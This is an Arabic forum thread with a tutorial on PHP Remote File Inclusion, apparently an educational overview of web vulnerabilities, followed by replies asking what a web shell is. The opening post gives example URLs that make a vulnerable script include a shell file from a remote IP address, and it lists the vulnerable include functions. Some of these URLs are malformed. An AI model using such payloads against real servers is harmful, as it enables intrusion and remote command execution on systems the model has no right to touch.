إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

Exploit RfI

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • [شرح] Exploit RfI

    السلام عليكم

    من المفترض ان اكتب هذا الموضوع في المدونة ولكن سأكتبها هنا واشير اليها بعد ذلك من المدونة .

    الموضوع هو عبارة عن شرح لمجموعة من الثغرات الويب التي نقراء عنها ويتم تطبيقها او استغلالها دون المعرفة بطبيعة العمل او كيف حدثت .
    Remote File Include
    Local File Include (Remote File Disclosure)
    Remote Sql Injection
    Remote Command Execution
    XSS (Cross Site Scripting)
    Upload Shell
    Dump Database
    Bypass Admincp

    الشرح يقسم الى جزئين الأول

    Remote File Include
    Local File Include (Remote File Disclosure)
    Remote Sql Injection
    Remote Command Execution

    والجزء الثاني ان شاء الله

    XSS (Cross Site Scripting)
    Upload Shell
    Dump Database
    Bypass Admincp

    بسم الله الرحمن الرحيم



    اهم المواقع التي من الممكن من خلالها متابعة جديد الثغرات

    http://www.exploit-db.com/
    http://www.securityfocus.com/
    http://securityreason.com/


    Remot File Include

    تعتبر هذا الثغرات من الثغرات البرمجية المتعلقة بلغة PHP . تسمح هذه الثغات بادراج ملفات بصيغ مختلفة (txt - php - gif - jpj ) . ويتم استخدامها في عملية ادراج كود خبيث او ما يسمى Shell .



    تقوم هنا دالة GET بادراج التعريف لدالة include وبعدها ينتهي الكود . فلو قمنا باخذ كلمة rfi وتم ادراجها بعد الملف سوف يقوم الملف بادراج ملف اخر من خارج السيرفر . كمثال

    كود PHP:
     www.xxx.com/index.php 
    ظهر لنا خطا

    كود PHP:
    warning main () function.include 
    نقوم هنا بادراج اي متغير وعلى سبيل المثال

    كود PHP:
     www.xxx.com/index.php?=rfi 
    في هذا النوع من الثغرات يبقى الخطا موجود
    كود PHP:
    warning main () function.include 
    لنجرب ان نقوم بادراج ملف من خارج السيرفر

    كود PHP:
     www.xxx.com/index.php?=rfi=shell.txt 
    سيتم جلب الملف من خارج السيرفر فهنا يتم رفع شل على مساحة ما ليكن على رابط ليتم استخدامه بمثل هذه الثغرات

    كود PHP:
     www.xxx.com/index.php?=rfi=http:://33.44.11/shell.txt 
    سيتم بذلك جلب الملف من خارج السيرفر لداخله ليتم بعد ذلك تطبيق الاوامر من خلال هذا الملف على السيرفر نفسه .


    طبعا اهم الدوال الي توقع فيها هذه الثغرة
    كود PHP:
    include
    include_once
    require_once 
    وهية عبارة عن دوال مفتوحة ويليها متغير $

    سكريبت ما يحتوي ملف باسم luk.php شاهدنا ان هنالك دالة مفتوحة ومتغير $

    كود PHP:
     include($g_include."str0k.php"); Hah 
    نلاحظ ان دالة include تبعها متغير $


    الملف المصاب luk.php
    والدالة المصابة g_include


    وبيكون التطبيق على هذا النحو

    كود PHP:
     www.xxx.com/index.php/include/luk.php?g_include=http:://33.44.11/shell.txt 


  • #2
    بارك الله فيك اخوي ابوفلان , خبرنا عن اسمك او على الاقل اسم الولد

    لديّ سؤال بسيط عن "shell" , ماتعريفه و المصطلح الحقيقي الذي يطلق عليه ؟ ام هذا اسمه ؟

    الذي اعرفه انه سيكربت مبرمج بلغة تفسيرية .. لكن لم أجد معلومات كثيرة عنه ,لأني أفتقد للإسم الحقيقي وليس الدارج
    كتب مفيدة : كتاب لينكس الشامل | دليل المستخدم العربي في أوامر لينكس | مخطوطتك الأولى (script) في الشيل | أوبنتو ببساطة

    تعليق


    • #3
      الله يسلمك بركات . اخوك فراس

      الشل هو عبارة عن سكريبت برمجي مبرمج بلغة php غالبا . يسمح بتطبيق اوامر واستعراض ملفات على سيرفرات linux وهنالك ايضا shell asp الذي يستخدم في سيرفرات ويندوز . هو عبارة عن اداة يستخدمها المخترق في تطبيق الاوامر الخاصة بسيرفرات لينكس مثلا

      ls
      ls -lv

      تساعده في جمع معلومات وقراءة ملفات توصله لمايريد .

      تعليق


      • #4
        شرح سلس ورائع ....نطمع في المزيد يا فراس
        اخوك فتحي
        •°o.O islamux O.o°•
        أنا إن عشت لنفسي عشت حقيرًهزيلا :::ومهما تعلمت لا أزال جهولا
        "يَوْمَ تَجِدُ كُلُّ نَفْسٍ مَا عَمِلَتْ مِنْ خَيْرٍ مُحْضَرا..الايه(آل عمران:30)

        *****
        إذَا لَمْ تَسْتَطِعْ شيئًا فدَعْهُ = وجاوِزْهُ إلى مَا تَستَطِيعُ
        تلميح اليوم

        FreeBSD في كبسولة !
        لا يطلب العلم مستحي ولا مستكبر
        اللهم اجعل عملنا خالصا لوجهك الكريم.
        فان تجد عيبا فسدَ الخللا ****** جلَ من لا عيب فيه وعلا
        كل مشاركاتي في المجتمع وقف لله تعالى
        Tweeter

        تعليق


        • #5
          أخوي الفاضل أولاً أشكر لك هذا الجهد


          ولكن السؤال : أين أكتب هذه الأوامر ؟

          تعليق


          • #6
            المشاركة الأصلية بواسطة linex مشاهدة المشاركة
            أخوي الفاضل أولاً أشكر لك هذا الجهد


            ولكن السؤال : أين أكتب هذه الأوامر ؟
            من ضمن برمجة الشل هنالك مكان يسمى Comand وفي هذه الخاصة يتم تنفيذ الأوامر .

            تعليق

            يعمل...
            X